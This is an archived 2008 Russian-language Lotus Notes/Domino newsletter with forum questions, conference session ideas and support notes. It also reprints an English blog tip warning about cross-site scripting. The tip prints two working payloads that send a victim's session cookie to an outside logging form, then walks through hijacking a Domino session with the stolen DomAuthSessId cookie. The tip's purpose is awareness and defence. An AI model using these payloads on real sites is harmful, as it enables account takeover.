Отправляет email-рассылки с помощью сервиса Sendsay

Бюллетень "Lotus Notes CodeStore"

Подписаться Бесплатная «Серебряная» новостная рассылка . Подписчиков 224 RSS
  Сентябрь 2008  
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30


За последние 60 дней 2 выпусков (1-2 раза в 2 месяца)


Сайт рассылки: http://lotusnotes.wordpress.com
Открыта: 28-03-2008

Автор
Леонид Николаевич Дорохов

Статистика

224 подписчиков
+1 за неделю
  Все выпуски  

Бюллетень "Lotus Notes CodeStore" No 81 от 2008-09-26


Рассылку ведет: Программист на Lotus NotesLotus CoderВыпуск No 81 от 2008-09-26
рассылка о программировании на Lotus Notes/Domino
Обсуждения на форумах, блогах. Примеры программного кода на LotusScript,@formula, Java

рассылка:выпускархивлентаблогсайт

Бюллетень "Lotus Notes CodeStore" Выпуск 13 от 21.04.2008

comp.soft.prog.lotuscodesrore

Поиск по сайтам о Lotus Notes
Тематически поиск только по сайтам о Lotus Notes.
lotus.googlecse.org.ua
Содержание выпуска

CodeStore. Примеры кодов

Еще примеры:
Больше кодов на сайтах:

Форумы.Свежи темы и обсуждения

попробуйте Domino 8.0.2
попробуйте Domino 8.0.2
Добрый день
LТ 8.х
необходимо выполнять группировку писем, по одному из полей с сортировкой по другому, как реализовать ?
Заранее спасибо.
blink.gif
Здраствуйте.
Вопрос может и глупый, но ничего сделать не могу и форум весь перерыл ничего такого не нашел.
Мне надо на LotusScript присвоить значения треж лотус имен полю ReaderDos(тип Readers) в событии QuerySave нового документа.

Я пытался сделать так
tmpText = "User1/org ; User2/org"
uidoc.FieldSetText("ReaderDos";tmpText)

Полю ридерс эти значения присвайваются, но эти пользователи документ не видят sad.gif

Делал так
tmpText = "User1/org" & Chr(10) & Chr(13) & "User2/org"
uidoc.FieldSetText("ReaderDos";tmpText)

и так

uidoc.FieldAppendText("ReaderDos"; "User1/org")
uidoc.FieldAppendText("ReaderDos"; "User2/org")

Ничего не помогает, я так понимаю, я что то делаю совсем неправильно, помогите срочно надо..... Спасибо

Может немного глупый вопрос но все же:
У пользователей удаление доков в почте по разному - у одних - выделил, delete, f9 , у других просто выделил, delete.
Где это настраивается? Ищу уже второй день
Добрый день
LТ 8.х
необходимо выполнять группировку писем, по одному из полей с сортировкой по другому, как реализовать ?
Заранее спасибо.
Прошу прощения, если что-то будет некорректно в моей формулировке, но я совсем новичок (если не сказать больше).

Ситуация следующая. Есть три доменных имени site1, site2 и site3.
"Сайтом" по сути является site1, который написан в Lotus. два других доменных имени просто закреплены за тем же IP-шником. В результате поисковые системы видят первый сайт как основной, а два других - как его зеркала. Это плохо. Закрыть два других сайта мы не можем, так как они тоже приносят определенный дополнительный трафик.

На Apache существует решение данной проблемы в виде так называемого 301 редиректа, который говорит поисковому роботу, что данный сайт перемещен "на постоянное место жительства" по другому адресу.

Есть ли аналогичный вариант постоянной переадрессации с одного домена на другой для Lotus?

На данный момент у нас получилось установить только 302 редирект. но он не устраивает поисковые системы. т.к. это временная переадрессация, и поисковый робот по-прежнему продолжает индексировать site2 и site3 и рассматривать их как зеркала.

ОЧЕНЬ НУЖНА ВАША ПОМОЩЬ!!!
Интересные темы:
Список форумов:

Tips. Советы

Following on from yesterday's discussion about users editing hidden fields I want to discuss another danger and the reason I was thinking about the problem in the first place.

Let's forget about the consequence of the actual change to the field for a moment. Even if changing it has no adverse effect on the system itself there is another, potentially dangerous, problem. Cross-Site Scripting or XSS.

Maybe you've heard of XSS but dismissed it as something not worthy of attention. You really shouldn't dismiss it too easily though. What if I were to say I could easily use XSS to login to your server as an administrator or any other user for that matter!? It's really easy to do!!

Let's assume you have a form that allows user-entered HTML. This can be either because you want them to (TinyMCE on top of a Rich Text field, for example) or because you don't strip HTML from fields where you don't want or expect it (the Title for example). Either way, if the user can enter HTML, they can then have a good go at hacking you.

As an example imagine a user enters the following HTML in to a field:

<script>document.write("<img src='http://extranet/xss.nsf/logcookie?
OpenForm&cookie="+document.cookie+"' />");</script>

Or even the following (which works in IE6) seemingly harmless-looking HTML:

<img src="javascript:location.href='http://extranet/xss.nsf/logcookie?
OpenForm&cookie='+document.cookie"/>

If either of the above (or the 1,000s of similar hacks) aren't properly filtered out then you could be in trouble!

If the above code was stored in a document and you opened it while logged in you'd reveal your authentication cookie's value to the hacker. They could also see your IP address and the URL you were logged in to.

To prove it works I actually tested it out. In the example above the form on the other server looked like this:

Hacked1

 

Note that the user would only see this if the <img> hack was used from two I showed above. If the <script> hack was used the user wouldn't see this and would be completely unaware of the problem.

Even if they are aware there's not much they can do. Even if they panic and close the browser it's too late. Although closing the browser logs them off, the session still exists on the server and if the hacker reproduces a cookie called DomAuthSessId with the value they now know the hacker will be logged in as you! Your only hope is that the user has the wherewithal to ring and tell somebody who can quit the HTTP task on the server and not start it again until they've fixed the huge security hole.

To test it out I made it so that the LogCookie Form (see the above screenshot) would run a WebQueryOpen agent to email me the cookie value and the URL they were logged in to. Then all I did was:

  1. [Hacker]: Post one of the above snippets of HTML to a website where I knew (or hoped if I were an actual hacker) there was no filtering.
  2. [User]: Visit the site while logged in as an Administrator who knows nothing of the attack.
  3. [Hacker]: Wait at the other end for the email(s) to arrive.
  4. [Hacker]: Take one of the emails and click the link in it which points to the URL (HTTP_Referer) of the hacked page.
  5. The link opens Firefox at the problem Domino website. Imagine the first thing you see is a login screen (like below).
    Hacked2
  6. Even if I don't have a login for the site it doesn't matter. I can now bypass the login by adding a cookie (see above) using the Web Developer plugin.
  7. All I need to do is add a cookie called DomAuthSessId (case sensitive!) with the same value as the one that was emailed to me, like so, being sure to tick "Session cookie":
     Hacked3
  8. After pressing OK all I need to do is refresh the page and it will send the cookie to the server, which will then think I'm logged in as the user who just opened the hacked page. Instead of seeing the login page I'll see the application itself and be able to do everything that user is allowed to (including changing their password!).
  9. Even if the user has since logged out it doesn't matter, just as long as the hacker receives the email and creates the cookie before the session times-out on the server!

Scarily easy! Note that I tested this from different servers and PCs. The server logging the cookie was different to the one hacked. The PC I logged in to with the stolen cookie was not the one I used to log in to when I visited the bad page and, so, had a different IP address. This is as real world a test as I could conjure up. Real enough to prove it's possible.

So then. This isn't one of my digs at Domino. This is a problem that affects all web server environments that user cookie-based authentication. I'm only showing how easy it is in the hope it will make you sit up and take notice of how serious XSS vulnerabilities can be.

Tomorrow I'll talk about a solution. That solution will be from an application perspective. As far as the server goes I can't see why Lotus don't tie a session to the IP the user logged in from. That and/or using the HttpOnly flag on the DomAuthSessId cookie, which would prevent JavaScript (and hence the hacker) from accessing it in most browsers.

Click here to post a response

Get an introduction to DirLint, a new tool available in Lotus Notes Domino 8 that scans directories and identifies issues such as invalid syntax in names, issues with the naming hierarchy scheme, and reports problems in directory names.

Еще советы:
Смотри советы на сайтах:

Блоги. Что обсуждают и пишут

Author: Gordon Lee
Tags: websphereportal web2.0
Idea:
For as long as I remember, Ron Sebastian has been dazzling us with demos at the Lotusphere Opening General Session. This session is for those who want to go beyond the Green County or Renovations portals to see an actual Web 2.0 business application deployed and used within a corporate environment. The Practitioner Portal is designed for the 100,000 knowledge workers in IBM's GBS consulting practice, incorporating Lotus products such as Portal, Sametime, Connections, Quickr, Unyte, and Atlas. See how wikis, blogs, ratings, and social tags are used in conjunction with legacy applications to create a new Knowledge Sharing environment. Gordon Lee and members of his development team will describe what it took to put this solution together, from the technical components to the cultural and socialization challenges of introducing Web 2.0. Enjoy 60 minutes of real code with no smoke, no mirrors, no stubs, no deception, no bull, and can you believe this, no Powerpoints.

Author: Kevin Pettitt
Tags: OpenNTF Templates
Idea:
This is an update to the session that Bruce and I delivered at LS08, and it will include a bunch of updated content. We would be interested in any thoughts about what you might expect or like to see in this presentation, especially if you've seen earlier versions from Lotusphere, the VIEW, or ILUG. Of course, if you have some free templates you want to tell us about by all means speak up!
 
For a reference example, the slides from the ILUG08 edition are here
 
******* The Abstract ********
 
If you think the only application templates available for Notes are the ones that are bundled with it (and even if you already know better) it’s time you learned more about the many excellent free and open source Notes and Domino templates and where they come from. Join Kevin and Bruce for an updated and fast-paced look at some of the best templates from OpenNTF.org, trade publications, bloggers, and other little known sources. While it’s easy to build your own applications in Notes, it’s even easier, and usually more rewarding, to build on top of someone else’s. Whether you’re a developer, admin, or both, you’ll come away from this session ready to put these templates into action to become more productive, make your job easier, and impress your boss.

Author: Denny Russell
Tags: lotusphere2009 best-practices Email retention-policies
Idea:
This topic would cover all the details from building an email retention policy and what to consider when implementing a solution.  Trying to figure out who, what and where are the biggest concerns when it comes to building your policy.  Knowing and understanding your companies enviroment and under what rules and regulations they fall under is key.
 

Author: Andrew Pollack
Tags: linux domino administration session
Idea:
Linux can be an outstanding server platform for IBM Lotus Domino. Don’t let the geek factor keep you trapped on another platform. Even if you’ve never used Linux at all, you’ll come away with enough understanding to set up, maintain, and troubleshoot your Linux based Domino server. We’ll demystify the command line, the networking, the file system, the security, and the process management. When you get home, you’ll be ready to go.

Why?

The more servers that move away from the Windows platform and onto the Linux platform, the less customer sites Microsoft can leverage away with vendor lock-in. Many administrators continue to use Windows as the platform for their Domino servers for no reason other than comfort level with the platform. This session provides an easy step to extend that comfort level to another choice.

Author: Andrew Pollack
Tags: Domino Security Review
Idea:
Learn how to objectively and methodically evaluate the security practices and configuration in your IBM Lotus Domino environment. Think like a penetration tester and you’ll lower support costs, reduce risk, and keep the audit department happy. The session has technical, management, and business process focused details. Stop putting big new locks on rusty chains. Learn to think about security in a broad context from an expert.

Author: Andrew Pollack
Tags: registration password domino development
Idea:
Does your solution face the general public? In this session you’ll see how to provide a way for new users to establish login credentials and for existing users to request password reminders or change their passwords. It’s a tightly focused session, with plenty of time spent looking at specific programming code and techniques used to make the process as seamless and low maintenance as possible.

Why?

There’s been a great deal of focus on Domino in the corporate environment, but more and more customer facing sites want to use web 2.0 technologies to face the public. To do that, they need to authenticate users. This topic was requested on IdeaJam, and is something I've has done several times on a large scale production basis. By focusing on a narrow topic, we can go into great depth and look at source code line by line in a session like this.

Author: Andrew Pollack
Tags: domino smtp spf adminstration
Idea:

Is managing your SMTP connectivity a trial and error process that feels like dabbling in the dark arts? Have you been accused of being an open relay or told your MX and PTR records don’t match? Do your users POP your IMAP when they try to connect from their cell phone? This session gives you the understanding of the world you’re connecting to. We’ll cover all those DNS topics from A to SPF, the difference between POP and IMAP, and how make your Domino server speak to the rest of the world properly.

Why?

Most sessions on mail topics focus only on the Domino side of the equation. Domino administrators don’t always understand the rest of the picture well. By focusing on the core internet protocols that make mail routing possible, we’ll give admins the knowledge they need to run better systems. This session has a narrow focus design to allow more depth and detail than usual.

Author: Andrew Pollack
Tags: domino smtp spf adminstration
Idea:
Is managing your SMTP connectivity a trial and error process that feels like dabbling in the dark arts? Have you been accused of being an open relay or told your MX and PTR records don’t match? Do your users POP your IMAP when they try to connect from their cell phone? This session gives you the understanding of the world you’re connecting to. We’ll cover all those DNS topics from A to SPF, the difference between POP and IMAP, and how make your Domino server speak to the rest of the world properly. Why? Most sessions on mail topics focus only on the Domino side of the equation. Domino administrators don’t always understand the rest of the picture well. By focusing on the core internet protocols that make mail routing possible, we’ll give admins the knowledge they need to run better systems. This session has a narrow focus design to allow more depth and detail than usual.

Author: Andrew Pollack
Tags: domino http ssl configuration administration
Idea:

The HTTP task is powerful and complex. We’ll go through the configuration and show you how to make your server respond just the way you want. We’ll talk about virtual web sites, multi-homing, URL redirection, headers, and path substitution. Learn the step by step process of requesting and installing an SSL certificate, and how you can use more than one SSL certificate on the same server. Understand the differences between session and basic authentication, LTPATokens, LDAP based authentication, and integration with IIS. Come in confused, walk out an expert.

Why?

The top support request I get from experienced admins in the business partner community and from site administrators is about configuring SSL certificates. Knowledge of how the HTTP task actually works is extremely limited. By picking this narrow topic, we can go into very specific step by step detail and make sure people get their servers configured correctly.

Author: Andrew Pollack
Tags: domino http ssl configuration administration
Idea:
The HTTP task is powerful and complex. We’ll go through the configuration and show you how to make your server respond just the way you want. We’ll talk about virtual web sites, multi-homing, URL redirection, headers, and path substitution. Learn the step by step process of requesting and installing an SSL certificate, and how you can use more than one SSL certificate on the same server. Understand the differences between session and basic authentication, LTPATokens, LDAP based authentication, and integration with IIS. Come in confused, walk out an expert. Why? The top support request I get from experienced admins in the business partner community and from site administrators is about configuring SSL certificates. Knowledge of how the HTTP task actually works is extremely limited. By picking this narrow topic, we can go into very specific step by step detail and make sure people get their servers configured correctly.

Author: Tim Paque
Tags: HTML Table Rows
Idea:
Add Table Row attributes:
 
Currently Cells and Entire tables have tags for IDs, Rows do not.
Under "Row Tags" for the table, it only offers Name.
 
I often need to set Row attributes, but have to write the entire table in HTML because I haven't found a simple way to set row attributes on a domino generated table.
 
This makes hiding/showing a row with javascript MUCH more difficult.

Author: David Price
Tags: Domino Exchange migration merger ls09
Idea:
Acquisitions and mergers are a fact of life, now more than ever. You will come across a company with Outlook and Exchange at some point. Lotus Notes Release 8 can stand toe to toe with Outlook in regards to UI and Domino continues to tower over Exchange. That being said, the best technology doesn’t always win. You must actively campaign and education the business. Learn what key tasks are needed at merger and at checkpoints along the way.

Finally benefit from my hard learned experience in migrating companies to Lotus from Exchange. Find out about resources such as IBM’s Project Liberate that can help you understand how expensive ‘free’ software can be. We will also touch on Sharepoint and why the free version (WSS) doesn’t scale and how expensive MOSS can be.

Finally learn how to size and budget for a migration in either directions. Presenting both migration options ensures that budget assumptions are accurate and that decisions are made with valid data.

Hope is not a plan; after this session you will be armed with facts, knowledge and experience.

Author: Chris Fickett
Tags: Connections iphone
Idea:
I would like to see a Connections mobile client for the Apple iPhone.  Similar to the Blackberry client.

Author: Chris Fickett
Tags: sametime iphone
Idea:
Build a Sametime client for the iPhone.

Author: Mike McGarel
Tags: domino design template
Idea:
You want to provide each of your client companies an extranet site with a custom look, features and functionality. But you want to avoid the maintenance nightmare of a multitude of database designs. This session will show you how to create a design template with the necessary flexibility to meet both goals. Techniques include the use of profile documents, subforms and style sheets. Slight variations for Notes/Domino versions 6, 7 and 8 will be examined.

Author: Adam Foster
Tags: Quickr design development code customisation lotus domino AJAX
Idea:
Sit back while we take you beyond the logo. Learn to: Find all the elements needed to customise Lotus Domino Quickr and how to centrally manage them across all your places. Dive into Custom themes, page layouts, forms, placebots, templates and custom CSS. Use Ajax to add Notes views to Quickr in 2 minutes, and Google Gadgets in 1 minute. DIY views of Quickr tasks, documents and folders. Customise My Places tabs and much more!

Author: Libby Ingrassia
Tags: ls09 best-practices Notes development project management
Idea:
I won't be giving this session, but two of my colleageus are planning to submit it:
Your choice of approach to Lotus development projects can signal success or failure. If you've ever had to document or inherit an application, and if you don't want to hear "I thought the application would do..." or "I expected it would be more like...," you need to make your Notes projects succeed using Notes tools, coupled with Project Management techniques, without sacrificing the benefits of Joint Application Design (JAD) & Rapid Application Development (RAD). JAD & RAD focus primarily on the design and development stages, but your approach needs to go beyond, and scale to both large and small scale applications. Take home Notes tools and best practices that let you manage your project from design through testing and documentation.

Author: Libby Ingrassia
Tags: ls09 domino administration
Idea:
I've been working on this one as a technical follow-up to my long-ago session with Ed on Selling Notes Internally. The connection is that an unhealthy environment is one of the big causes of complaints and negativity against Notes. The healthy environment can better withstand competition and can support further investment...
 
Whether users complain about poor Notes performance (and we know where that leads), you inherit an environment, or you're a new administrator wanting confidence in your choices, this session is for you. A health check that follows an organized method for auditing the servers, including Domino Directory, server configuration, and security, can lead to consolidations, upgrades, and improvements to performance, security, and manageability of your environment. Want Notes to be loved and you cast as the hero(ine)? Take home a checklist to guide your own audits, best practice settings, and configurations to compare with what you find. Prioritize based on urgency and complexity to keep Notes running smoothly and serving the business.

Еще записи:
Интересные блоги специалистов:

Статьи и Документация

When attaching a file to a rich text field in Lotus Notes 7 on a PPC Macintosh OS X machine from a Win32 file share, you receive a "File does not exist: <network path to file>" error and the file is not attached.
Starting in Notes 8.0.1, a new tab is presented within mail preferences. This tab allows the setting of Sametime Unyte preferences to be used with any associated mail or calendar activities. You have not setup the Sametime Unyte facilities within your environment and, to avoid confusion, you want to disable or hide display of this tab, and want to disable this tab. Is it possible to disable or hide the display of the Sametime Unyte tab in Lotus Notes? Presently, there is no means through a Domino policy t
This error occurs if a predefined context sensitive toolbar (such as Navigate View, Read Document, Edit Document, etc.) is not present in the outline in bookmark.nsf where toolbar data is stored. This indicates a corrupt bookmark database
Is it possible to disable embedded conversation twistie in email messages?
When opening a mail database, the title of the database is missing, and you simply see " - Inbox" instead of "User Name - Inbox"
How can you find out which tasks are listening in on which ports?
The Availability option, "Limit how far in advance a room/resource can be reserved" is not working properly. The room and resource is set to "Limit by days - Number of days -90." Users are not able to reserve the room after 7 weeks .
A Domino® 8.0.x server crashed while an administrator was attempting to upgrade a user's mail database template to a company's custom mail 8.0.x template.
Chair sends an invite to one invitee and that one invitee receives invitation but his name is listed in BCC field instead of Required To. As a result, the invitation does not have a Respond button.
How can you get your Notes Client to remember you sort preference when browsing in a folder?
Также почитатай:
Найти документацию можно на сайтах:
СсылкиУтилиты и программыСайты о Lotus Notes
В избранное